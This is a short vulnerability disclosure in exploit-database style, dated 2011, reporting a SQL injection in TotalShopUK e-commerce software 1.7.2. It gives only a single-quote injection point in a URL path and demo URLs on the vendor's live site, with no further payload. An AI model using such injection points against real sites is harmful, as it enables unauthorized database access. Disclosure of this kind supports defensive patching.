# Exploit Title: TotalShopUK (E-Commerce System) SQL Injection
# Date: 19.08.2011
# Author: Eyup CELIK
# Software Link: http://www.totalshopuk.com
# Version: 1.7.2
# Tested on: All versions are Vulnerability

ISSUE

SQL Injection can be done using the command input

Exploit:
products/c/index.php/1'

Demo:
http://www.totalshopuk.com/products/c/index.php/1'
http://www.totalshopuk.com/products/c/laptops/1'


Thanks,


Eyüp CELIK
Bilgi Teknolojileri Güvenlik Uzmani
http://www.eyupcelik.com.tr